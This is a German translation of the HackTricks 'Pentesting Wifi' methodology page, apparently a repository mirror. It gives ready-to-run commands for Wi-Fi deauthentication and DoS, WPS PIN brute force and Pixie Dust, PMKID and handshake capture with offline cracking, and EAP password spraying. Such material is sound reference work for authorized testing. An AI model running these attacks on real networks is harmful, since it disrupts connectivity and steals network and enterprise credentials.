Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/pentesting-wifi
History
Translator 9a007dd968 Translated ['generic-methodologies-and-resources/pentesting-wifi/README.
2024-03-26 19:23:34 +00:00
..
evil-twin-eap-tls.md Translated to German 2024-02-10 15:36:32 +00:00
README.md Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-03-26 19:23:34 +00:00

README.md

Pentesting Wifi

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!

Hacking-Einblicke
Beschäftigen Sie sich mit Inhalten, die sich mit dem Nervenkitzel und den Herausforderungen des Hackens befassen

Echtzeit-Hack-News
Bleiben Sie mit der schnelllebigen Hacking-Welt durch Echtzeitnachrichten und Einblicke auf dem Laufenden

Neueste Ankündigungen
Bleiben Sie über die neuesten Bug-Bounties und wichtige Plattformupdates informiert

Treten Sie uns auf Discord bei und beginnen Sie noch heute mit der Zusammenarbeit mit Top-Hackern!

Wifi-Grundbefehle

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Werkzeuge

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

Airgeddon ist ein vielseitiges Tool zur Prüfung der Sicherheit von drahtlosen Netzwerken. Es kombiniert verschiedene bekannte Angriffsmethoden in einem einfach zu bedienenden Toolkit. Mit Airgeddon können Penetrationstester WLAN-Netzwerke auf Schwachstellen testen und Sicherheitslücken identifizieren. Das Tool unterstützt eine Vielzahl von Angriffen, darunter Deauthentication-Angriffe, WPS-Angriffe, Evil Twin-Angriffe und vieles mehr. Es ist ein leistungsstarkes Werkzeug für die Durchführung von WLAN-Penetrationstests.

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Führen Sie airgeddon mit Docker aus

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Von: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Es kann Evil Twin, KARMA und Known Beacons Angriffe durchführen und dann eine Phishing-Vorlage verwenden, um das tatsächliche Netzwerkkennwort zu erhalten oder Zugangsdaten für soziale Netzwerke zu erfassen.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Dieses Tool automatisiert WPS/WEP/WPA-PSK-Angriffe. Es wird automatisch:

  • Das Interface in den Überwachungsmodus versetzen
  • Nach möglichen Netzwerken scannen - und Sie die Opfer auswählen lassen
  • Bei WEP - WEP-Angriffe starten
  • Bei WPA-PSK
  • Bei WPS: Pixie-Dust-Angriff und Brute-Force-Angriff (Vorsicht, der Brute-Force-Angriff könnte lange dauern). Beachten Sie, dass keine Null-PIN oder Datenbank-/generierten PINs ausprobiert werden.
  • Versuchen, den PMKID vom AP zu erfassen, um ihn zu knacken
  • Versuchen, Clients des AP zu deauthentifizieren, um einen Handshake zu erfassen
  • Bei PMKID oder Handshake versuchen, mit den Top5000-Passwörtern Brute-Force durchzuführen.

Angriffsübersicht

  • DoS
  • Deauthentifizierung/Dissoziation -- Alle trennen (oder ein bestimmtes ESSID/Client)
  • Zufällige Fake-APs -- Netzwerke verstecken, mögliche Scanner abstürzen lassen
  • AP überlasten -- Versuchen, den AP zu deaktivieren (normalerweise nicht sehr nützlich)
  • WIDS -- Mit dem IDS spielen
  • TKIP, EAPOL -- Einige spezifische Angriffe, um einige APs zu DoS
  • Knacken
  • WEP knacken (mehrere Tools und Methoden)
  • WPA-PSK
  • WPS-PIN "Brute-Force"
  • WPA PMKID-Brute-Force
  • [DoS +] WPA-Handshake-Erfassung + Knacken
  • WPA-MGT
  • Benutzername erfassen
  • Brute-Force-Anmeldeinformationen
  • Evil Twin (mit oder ohne DoS)
  • Offener Evil Twin [+ DoS] -- Nützlich, um Captive-Portal-Anmeldeinformationen zu erfassen und/oder LAN-Angriffe durchzuführen
  • WPA-PSK Evil Twin -- Nützlich für Netzwerkangriffe, wenn Sie das Passwort kennen
  • WPA-MGT -- Nützlich, um Firmenanmeldeinformationen zu erfassen
  • KARMA, MANA, Loud MANA, Bekanntes Beacon
  • + Offen -- Nützlich, um Captive-Portal-Anmeldeinformationen zu erfassen und/oder LAN-Angriffe durchzuführen
  • + WPA -- Nützlich, um WPA-Handshakes zu erfassen

DOS

Deauthentifizierungspakete

Beschreibung von hier:.

Deauthentifizierungs-Angriffe, eine verbreitete Methode im Wi-Fi-Hacking, beinhalten das Fälschen von "Management"-Frames, um Geräte gewaltsam von einem Netzwerk zu trennen. Diese unverschlüsselten Pakete täuschen Clients vor, dass sie vom legitimen Netzwerk stammen, was Angreifern ermöglicht, WPA-Handshakes für Knackzwecke zu sammeln oder Netzwerkverbindungen dauerhaft zu stören. Diese Taktik, alarmierend in ihrer Einfachheit, wird weit verbreitet eingesetzt und hat erhebliche Auswirkungen auf die Netzwerksicherheit.

Deauthentifizierung mit Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 bedeutet Deauthentifizierung
  • 1 ist die Anzahl der zu sendenden Deauthentifizierungen (Sie können mehrere senden, wenn Sie möchten); 0 bedeutet, sie kontinuierlich zu senden
  • -a 00:14:6C:7E:40:80 ist die MAC-Adresse des Zugriffspunkts
  • -c 00:0F:B5:34:30:30 ist die MAC-Adresse des Clients, der deauthentifiziert werden soll; wenn dies ausgelassen wird, wird eine Rundfunk-Deauthentifizierung gesendet (funktioniert nicht immer)
  • ath0 ist der Schnittstellennamen

Trennungspakete

Trennungspakete, ähnlich wie Deauthentifizierungspakete, sind eine Art von Verwaltungsrahmen, die in WLAN-Netzwerken verwendet werden. Diese Pakete dienen dazu, die Verbindung zwischen einem Gerät (wie einem Laptop oder Smartphone) und einem Zugriffspunkt (AP) zu trennen. Der Hauptunterschied zwischen Trennung und Deauthentifizierung liegt in ihren Anwendungsszenarien. Während ein AP Deauthentifizierungspakete aussendet, um Rogue-Geräte explizit aus dem Netzwerk zu entfernen, werden Trennungspakete in der Regel gesendet, wenn der AP heruntergefahren, neu gestartet oder verlegt wird, was die Trennung aller verbundenen Knoten erforderlich macht.

Dieser Angriff kann mit mdk4 (Modus "d") durchgeführt werden:

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Weitere DOS-Angriffe durch mdk4

Hier klicken.

ANGRIFFSMODUS b: Beacon-Flutung

Sendet Beacon-Frames, um gefälschte APs bei Clients anzuzeigen. Dies kann manchmal Netzwerkscanner und sogar Treiber zum Absturz bringen!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ANGRIFFSMODUS a: Authentifizierungsverweigerung

Das Senden von Authentifizierungsrahmen an alle erreichbaren Access Points (APs) in Reichweite kann diese APs überlasten, insbesondere wenn zahlreiche Clients beteiligt sind. Dieser intensive Datenverkehr kann zu Systeminstabilität führen, wodurch einige APs einfrieren oder sogar zurückgesetzt werden können.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ANGRIFFSMODUS p: SSID-Sondierung und Bruteforcing

Das Sondieren von Zugriffspunkten (APs) überprüft, ob eine SSID ordnungsgemäß offengelegt wird und bestätigt die Reichweite des APs. Diese Technik, in Verbindung mit dem Bruteforcing versteckter SSIDs mit oder ohne Wortliste, hilft dabei, verborgene Netzwerke zu identifizieren und darauf zuzugreifen.

ANGRIFFSMODUS m: Ausnutzung von Michael-Gegenmaßnahmen

Das Senden von zufälligen oder duplizierten Paketen an verschiedene QoS-Warteschlangen kann Michael-Gegenmaßnahmen auf TKIP-APs auslösen, was zu einer einminütigen Abschaltung des APs führt. Diese Methode ist eine effiziente DoS (Denial of Service)-Angriffstaktik.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ANGRIFFSMODUS e: EAPOL Start- und Logoff-Paketinjektion

Das Überschwemmen eines AP mit EAPOL Start-Frames erzeugt falsche Sitzungen, überlastet den AP und blockiert legitime Clients. Alternativ können durch das Einschleusen von falschen EAPOL Logoff-Nachrichten Clients zwangsweise getrennt werden. Beide Methoden stören effektiv den Netzwerkdienst.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ANGRIFFSMODUS s: Angriffe auf IEEE 802.11s Mesh-Netzwerke

Verschiedene Angriffe auf die Verbindungsverwaltung und Routenfindung in Mesh-Netzwerken.

ANGRIFFSMODUS w: WIDS-Verwirrung

Das Verbinden von Clients mit mehreren WDS-Knoten oder gefälschten Rogue-APs kann Intrusion Detection und Prevention Systems manipulieren, Verwirrung stiften und potenziellen Missbrauch des Systems ermöglichen.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ANGRIFFSMODUS f: Paket-Fuzzer

Ein Paket-Fuzzer mit vielfältigen Paketquellen und einem umfassenden Satz von Modifikatoren zur Paketmanipulation.

Airggedon

Airgeddon bietet die meisten der in den vorherigen Kommentaren vorgeschlagenen Angriffe:

WPS

WPS (Wi-Fi Protected Setup) vereinfacht den Prozess des Verbindens von Geräten mit einem Router und verbessert die Einrichtungsgeschwindigkeit und -einfachheit für Netzwerke, die mit WPA oder WPA2 Personal verschlüsselt sind. Es ist für die leicht kompromittierbare WEP-Sicherheit unwirksam. WPS verwendet eine 8-stellige PIN, die in zwei Hälften validiert wird, was sie anfällig für Brute-Force-Angriffe macht, aufgrund ihrer begrenzten Anzahl von Kombinationen (11.000 Möglichkeiten).

WPS-Brute-Force

Es gibt 2 Hauptwerkzeuge, um diese Aktion durchzuführen: Reaver und Bully.

  • Reaver wurde entwickelt, um ein robuster und praktischer Angriff gegen WPS zu sein und wurde gegen eine Vielzahl von Zugriffspunkten und WPS-Implementierungen getestet.
  • Bully ist eine neue Implementierung des WPS-Brute-Force-Angriffs, geschrieben in C. Es hat mehrere Vorteile gegenüber dem Original-Reaver-Code: weniger Abhängigkeiten, verbesserte Speicher- und CPU-Leistung, korrekte Behandlung der Endianness und einen robusteren Satz von Optionen.

Der Angriff nutzt die Schwachstelle der WPS-PIN aus, insbesondere die Offenlegung der ersten vier Ziffern und die Rolle der letzten Ziffer als Prüfsumme, was den Brute-Force-Angriff erleichtert. Verteidigungen gegen Brute-Force-Angriffe, wie das Blockieren von MAC-Adressen aggressiver Angreifer, erfordern eine MAC-Adressrotation, um den Angriff fortzusetzen.

Nach dem Erhalt der WPS-PIN mit Tools wie Bully oder Reaver kann der Angreifer den WPA/WPA2 PSK ableiten und so einen dauerhaften Netzwerkzugriff sicherstellen.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Intelligenter Brute-Force-Angriff

Dieser verfeinerte Ansatz zielt auf WPS-PINs ab, die bekannte Schwachstellen nutzen:

  1. Vorab entdeckte PINs: Verwenden Sie eine Datenbank bekannter PINs, die mit bestimmten Herstellern verknüpft sind, die einheitliche WPS-PINs verwenden. Diese Datenbank korreliert die ersten drei Oktette der MAC-Adressen mit wahrscheinlichen PINs für diese Hersteller.
  2. PIN-Generierungsalgorithmen: Nutzen Sie Algorithmen wie ComputePIN und EasyBox, die WPS-PINs basierend auf der MAC-Adresse des AP berechnen. Der Arcadyan-Algorithmus erfordert zusätzlich eine Geräte-ID, was dem PIN-Generierungsprozess eine weitere Ebene hinzufügt.

WPS Pixie Dust-Angriff

Dominique Bongard entdeckte einen Fehler in einigen Access Points (APs) bezüglich der Erstellung von geheimen Codes, bekannt als Nonces (E-S1 und E-S2). Wenn diese Nonces herausgefunden werden können, wird das Knacken des WPS-PINs des APs einfach. Der AP enthüllt den PIN innerhalb eines speziellen Codes (Hash), um zu beweisen, dass er legitim ist und kein gefälschter (Rogue) AP ist. Diese Nonces sind im Wesentlichen die "Schlüssel" zum Entsperren des "Safes", der den WPS-PIN enthält. Weitere Informationen dazu finden Sie hier.

Einfach ausgedrückt besteht das Problem darin, dass einige APs nicht zufällig genug Schlüssel für die Verschlüsselung des PINs während des Verbindungsvorgangs verwendet haben. Dies macht den PIN anfällig dafür, von außerhalb des Netzwerks geraten zu werden (Offline-Brute-Force-Angriff).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Wenn Sie das Gerät nicht in den Überwachungsmodus wechseln möchten oder reaver und bully Probleme haben, können Sie OneShot-C ausprobieren. Dieses Tool kann den Pixie Dust-Angriff ausführen, ohne in den Überwachungsmodus wechseln zu müssen.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin Angriff

Einige schlecht konzipierte Systeme erlauben sogar einen Null-PIN (einen leeren oder nicht vorhandenen PIN), um Zugriff zu gewähren, was ziemlich ungewöhnlich ist. Das Tool Reaver ist in der Lage, diese Schwachstelle zu testen, im Gegensatz zu Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Alle vorgeschlagenen WPS-Angriffe können einfach mit airgeddon durchgeführt werden.

  • 5 und 6 ermöglichen es Ihnen, Ihre benutzerdefinierte PIN zu versuchen (falls Sie eine haben)
  • 7 und 8 führen den Pixie Dust-Angriff durch
  • 13 ermöglicht es Ihnen, die NULL-PIN zu testen
  • 11 und 12 werden die PINs, die mit dem ausgewählten AP aus verfügbaren Datenbanken zusammenhängen, zusammentragen und mögliche PINs generieren, indem sie ComputePIN, EasyBox und optional Arcadyan (empfohlen, warum nicht?) verwenden
  • 9 und 10 werden jede mögliche PIN testen

WEP

Heutzutage so kaputt und ungenutzt. Wissen Sie einfach, dass airgeddon eine WEP-Option namens "All-in-One" hat, um diese Art von Schutz anzugreifen. Mehr Tools bieten ähnliche Optionen.

Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!

Hacking Insights
Beschäftigen Sie sich mit Inhalten, die sich mit dem Nervenkitzel und den Herausforderungen des Hackens befassen

Echtzeit-Hack-News
Bleiben Sie mit der schnelllebigen Hacking-Welt durch Echtzeitnachrichten und Einblicke auf dem Laufenden

Neueste Ankündigungen
Bleiben Sie über die neuesten Bug-Bounties und wichtige Plattformupdates informiert

Treten Sie uns bei Discord bei und beginnen Sie noch heute mit den Top-Hackern zusammenzuarbeiten!

WPA/WPA2 PSK

PMKID

Im Jahr 2018 enthüllte hashcat eine neue Angriffsmethode, die einzigartig ist, da sie nur ein einziges Paket benötigt und keine Clients erforderlich sind, die mit dem Ziel-AP verbunden sind - nur die Interaktion zwischen dem Angreifer und dem AP.

Viele moderne Router fügen dem ersten EAPOL-Frame während der Assoziation ein optionales Feld hinzu, das als Robust Security Network bekannt ist. Dies beinhaltet den PMKID.

Wie im Originalbeitrag erklärt, wird der PMKID unter Verwendung bekannter Daten erstellt:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Angesichts dessen, dass der "PMK-Name" konstant ist, kennen wir die BSSID des AP und der Station, und der PMK ist identisch mit dem aus einem vollständigen 4-Wege-Handshake, kann hashcat diese Informationen verwenden, um den PSK zu knacken und das Passwort wiederherzustellen!

Um diese Informationen zu sammeln und das Passwort lokal per Brute-Force zu knacken, können Sie Folgendes tun:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Die PMKIDs, die erfasst wurden, werden in der Konsole angezeigt und auch im Verzeichnis _/tmp/attack.pcap_ gespeichert.
Konvertiere nun den Capture in das hashcat/john Format und knacke es:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Bitte beachten Sie, dass das Format eines korrekten Hashs 4 Teile enthält, wie: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Wenn Ihrer nur 3 Teile enthält, dann ist er ungültig (die PMKID-Erfassung war nicht gültig).

Beachten Sie, dass hcxdumptool auch Handshakes erfasst (etwas Ähnliches wird angezeigt: MP:M1M2 RC:63258 EAPOLTIME:17091). Sie können die Handshakes in das hashcat/john-Format mit cap2hccapx umwandeln.

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Ich habe festgestellt, dass einige mit diesem Tool erfasste Handshakes selbst bei Kenntnis des richtigen Passworts nicht geknackt werden konnten. Ich würde empfehlen, Handshakes auch auf herkömmliche Weise zu erfassen, wenn möglich, oder mehrere mit diesem Tool zu erfassen.

Handshake-Erfassung

Ein Angriff auf WPA/WPA2-Netzwerke kann durch Erfassen eines Handshakes und den Versuch, das Passwort offline zu knacken, ausgeführt werden. Dieser Prozess beinhaltet das Überwachen der Kommunikation eines bestimmten Netzwerks und BSSID auf einem bestimmten Kanal. Hier ist eine übersichtliche Anleitung:

  1. Identifizieren Sie die BSSID, den Kanal und einen verbundenen Client des Zielnetzwerks.
  2. Verwenden Sie airodump-ng, um den Netzwerkverkehr auf dem angegebenen Kanal und BSSID zu überwachen, in der Hoffnung, einen Handshake zu erfassen. Der Befehl sieht wie folgt aus:
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  1. Um die Wahrscheinlichkeit zu erhöhen, einen Handshake zu erfassen, trennen Sie den Client vorübergehend vom Netzwerk, um eine erneute Authentifizierung zu erzwingen. Dies kann mit dem Befehl aireplay-ng durch Senden von Deauthentifizierungspaketen an den Client erreicht werden:
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note, dass da der Client deauthentifiziert wurde, er versuchen könnte, sich mit einem anderen AP zu verbinden oder in anderen Fällen, mit einem anderen Netzwerk.

Sobald in airodump-ng einige Handshake-Informationen erscheinen, bedeutet dies, dass der Handshake erfasst wurde und du das Abhören stoppen kannst:

Sobald der Handshake erfasst ist, kannst du ihn mit aircrack-ng knacken:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Überprüfen Sie, ob der Handshake in der Datei vorhanden ist

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Wenn dieses Tool einen unvollständigen Handshake eines ESSIDs vor dem vollständigen findet, wird es den gültigen nicht erkennen.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

In Unternehmens-WLAN-Setups stoßen Sie auf verschiedene Authentifizierungsmethoden, die jeweils unterschiedliche Sicherheitsstufen und Verwaltungsfunktionen bieten. Wenn Sie Tools wie airodump-ng zur Inspektion des Netzwerkverkehrs verwenden, könnten Sie Kennungen für diese Authentifizierungstypen bemerken. Einige gängige Methoden sind:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
  1. EAP-GTC (Generic Token Card):
  • Diese Methode unterstützt Hardware-Token und Einmalpasswörter innerhalb von EAP-PEAP. Im Gegensatz zu MSCHAPv2 verwendet sie keine Peer-Herausforderung und sendet Passwörter im Klartext an den Zugriffspunkt, was ein Risiko für Downgrade-Angriffe darstellt.
  1. EAP-MD5 (Message Digest 5):
  • Beinhaltet das Senden des MD5-Hash des Passworts vom Client. Es wird nicht empfohlen aufgrund der Anfälligkeit für Wörterbuchangriffe, des Mangels an Serverauthentifizierung und der Unfähigkeit, sitzungsspezifische WEP-Schlüssel zu generieren.
  1. EAP-TLS (Transport Layer Security):
  • Nutzt sowohl Client- als auch Serverzertifikate zur Authentifizierung und kann benutzerbasierte und sitzungsbasierte WEP-Schlüssel dynamisch generieren, um die Kommunikation zu sichern.
  1. EAP-TTLS (Tunneled Transport Layer Security):
  • Bietet eine gegenseitige Authentifizierung über einen verschlüsselten Tunnel sowie eine Methode zur Ableitung dynamischer, benutzerspezifischer, sitzungsspezifischer WEP-Schlüssel. Es erfordert nur Serverzertifikate, wobei Clients Anmeldeinformationen verwenden.
  1. PEAP (Protected Extensible Authentication Protocol):
  • Funktioniert ähnlich wie EAP, indem es einen TLS-Tunnel für geschützte Kommunikation erstellt. Es ermöglicht die Verwendung schwächerer Authentifizierungsprotokolle über EAP aufgrund des Schutzes, den der Tunnel bietet.
  • PEAP-MSCHAPv2: Oft als PEAP bezeichnet, kombiniert es den anfälligen MSCHAPv2-Herausforderungs-/Antwortmechanismus mit einem schützenden TLS-Tunnel.
  • PEAP-EAP-TLS (oder PEAP-TLS): Ähnlich wie EAP-TLS, initiiert jedoch einen TLS-Tunnel, bevor Zertifikate ausgetauscht werden, was eine zusätzliche Sicherheitsebene bietet.

Weitere Informationen zu diesen Authentifizierungsmethoden finden Sie hier und hier.

Benutzername erfassen

Beim Lesen von https://tools.ietf.org/html/rfc3748#page-27 sieht es so aus, als ob bei Verwendung von EAP die "Identitäts"-Nachrichten unterstützt werden müssen und der Benutzername in den "Antwort-Identitäts"-Nachrichten im Klartext gesendet wird.

Selbst bei Verwendung einer der sichersten Authentifizierungsmethoden: PEAP-EAP-TLS ist es möglich, den im EAP-Protokoll gesendeten Benutzernamen zu erfassen. Um dies zu tun, erfassen Sie eine Authentifizierungskommunikation (starten Sie airodump-ng auf einem Kanal und wireshark auf derselben Schnittstelle) und filtern Sie die Pakete nach eapol.
Im Paket "Antwort, Identität" wird der Benutzername des Clients angezeigt.

Anonyme Identitäten

Die Identitätsverbergung wird sowohl von EAP-PEAP als auch von EAP-TTLS unterstützt. Im Kontext eines WLAN-Netzwerks wird eine EAP-Identitätsanfrage in der Regel vom Zugriffspunkt (AP) während des Assoziationsprozesses initiiert. Um den Schutz der Benutzeranonymität zu gewährleisten, enthält die Antwort des EAP-Clients auf dem Gerät des Benutzers nur die für den initialen RADIUS-Server erforderlichen wesentlichen Informationen zur Verarbeitung der Anfrage. Dieses Konzept wird durch die folgenden Szenarien veranschaulicht:

  • EAP-Identität = anonym
  • In diesem Szenario verwenden alle Benutzer das Pseudonym "anonym" als ihren Benutzeridentifikator. Der initiale RADIUS-Server fungiert entweder als EAP-PEAP- oder EAP-TTLS-Server und ist für die Verwaltung des serverseitigen Teils des PEAP- oder TTLS-Protokolls verantwortlich. Die innere (geschützte) Authentifizierungsmethode wird entweder lokal behandelt oder an einen entfernten (Heim-)RADIUS-Server delegiert.
  • EAP-Identität = anonym@realm_x

  • In dieser Situation verbergen Benutzer aus verschiedenen Bereichen ihre Identitäten, während sie ihre jeweiligen Bereiche angeben. Dies ermöglicht es dem initialen RADIUS-Server, die EAP-PEAP- oder EAP-TTLS-Anfragen an RADIUS-Server in ihren Heimbereichen weiterzuleiten, die als PEAP- oder TTLS-Server fungieren. Der initiale RADIUS-Server fungiert ausschließlich als RADIUS-Relaisknoten.

  • Alternativ kann der initiale RADIUS-Server als EAP-PEAP- oder EAP-TTLS-Server fungieren und die geschützte Authentifizierungsmethode entweder selbst behandeln oder an einen anderen Server weiterleiten. Diese Option erleichtert die Konfiguration unterschiedlicher Richtlinien für verschiedene Bereiche.

In EAP-PEAP initiiert der PEAP-Server, sobald der TLS-Tunnel zwischen dem PEAP-Server und dem PEAP-Client hergestellt ist, eine EAP-Identitätsanfrage und überträgt sie durch den TLS-Tunnel. Der Client antwortet auf diese zweite EAP-Identitätsanfrage, indem er eine EAP-Identitätsantwort sendet, die die wahre Identität des Benutzers durch den verschlüsselten Tunnel enthält. Dieser Ansatz verhindert effektiv die Offenlegung der tatsächlichen Identität des Benutzers für jeden, der den 802.11-Verkehr abhört.

EAP-TTLS folgt einem etwas anderen Verfahren. Mit EAP-TTLS authentifiziert sich der Client normalerweise mit PAP oder CHAP, gesichert durch den TLS-Tunnel. In diesem Fall enthält der Client einen Benutzername-Attribut und entweder ein Passwort- oder CHAP-Passwort-Attribut in der initialen TLS-Nachricht, die nach der Tunnelherstellung gesendet wird.

Unabhängig vom gewählten Protokoll erhält der PEAP/TTLS-Server nach Herstellung des TLS-Tunnels Kenntnis von der wahren Identität des Benutzers. Die wahre Identität kann als Benutzer@Bereich oder einfach Benutzer dargestellt werden. Wenn der PEAP/TTLS-Server auch für die Authentifizierung des Benutzers verantwortlich ist, besitzt er nun die Identität des Benutzers und fährt mit der durch den TLS-Tunnel geschützten Authentifizierungsmethode fort. Andernfalls kann der PEAP/TTLS-Server eine neue RADIUS-Anfrage an den Heim-RADIUS-Server des Benutzers weiterleiten. Diese neue RADIUS-Anfrage lässt die PEAP- oder TTLS-Protokollschicht weg. In Fällen, in denen die geschützte Authentifizierungsmethode EAP ist, werden die inneren EAP-Nachrichten ohne den EAP-PEAP- oder EAP-TTLS-Wrapper an den Heim-RADIUS-Server gesendet. Das Benutzername-Attribut der ausgehenden RADIUS-Nachricht enthält die wahre Identität des Benutzers und ersetzt den anonymen Benutzernamen aus der eingehenden RADIUS-Anfrage. Wenn die geschützte Authentifizierungsmethode PAP oder CHAP ist (nur von TTLS unterstützt), werden das Benutzername- und andere Authentifizierungsattribute aus der TLS-Nutzlast in der ausgehenden RADIUS-Nachricht ersetzt und ersetzen den anonymen Benutzernamen und die TTLS-EAP-Nachrichtenattribute in der eingehenden RADIUS-Anfrage.

Weitere Informationen finden Sie unter https://www.interlinknetworks.com/app_notes/eap-peap.htm

EAP-Bruteforce (Passwort-Spray)

Wenn erwartet wird, dass der Client einen Benutzernamen und ein Passwort verwendet (beachten Sie, dass EAP-TLS in diesem Fall nicht gültig ist), könnten Sie versuchen, eine Liste von Benutzernamen (siehe nächster Abschnitt) und Passwörtern zu erhalten und versuchen, auf den Zugriff zuzugreifen, indem Sie air-hammer. verwenden.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Du könntest diesen Angriff auch mit eaphammer durchführen:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Client-Angriffstheorie

Netzwerkauswahl und Roaming

  • Das 802.11-Protokoll definiert, wie sich eine Station einem Extended Service Set (ESS) anschließt, gibt jedoch nicht die Kriterien für die Auswahl eines ESS oder eines Zugriffspunkts (AP) darin an.
  • Stationen können zwischen APs wechseln, die dieselbe ESSID teilen, und so die Konnektivität über ein Gebäude oder ein Gebiet aufrechterhalten.
  • Das Protokoll erfordert eine Authentifizierung der Station beim ESS, schreibt jedoch keine Authentifizierung des AP bei der Station vor.

Bevorzugte Netzwerklisten (PNLs)

  • Stationen speichern die ESSID jedes drahtlosen Netzwerks, mit dem sie sich verbinden, in ihrer bevorzugten Netzwerkliste (PNL) zusammen mit netzwerkspezifischen Konfigurationsdetails.
  • Die PNL wird verwendet, um automatisch eine Verbindung zu bekannten Netzwerken herzustellen und so die Benutzererfahrung durch Vereinfachung des Verbindungsvorgangs zu verbessern.

Passives Scannen

  • APs senden regelmäßig Beacon-Frames aus, um ihre Präsenz und Funktionen bekannt zu geben, einschließlich der ESSID des AP, es sei denn, das Senden ist deaktiviert.
  • Während des passiven Scannens hören Stationen auf Beacon-Frames. Wenn die ESSID eines Beacons mit einem Eintrag in der PNL der Station übereinstimmt, kann die Station automatisch eine Verbindung zu diesem AP herstellen.
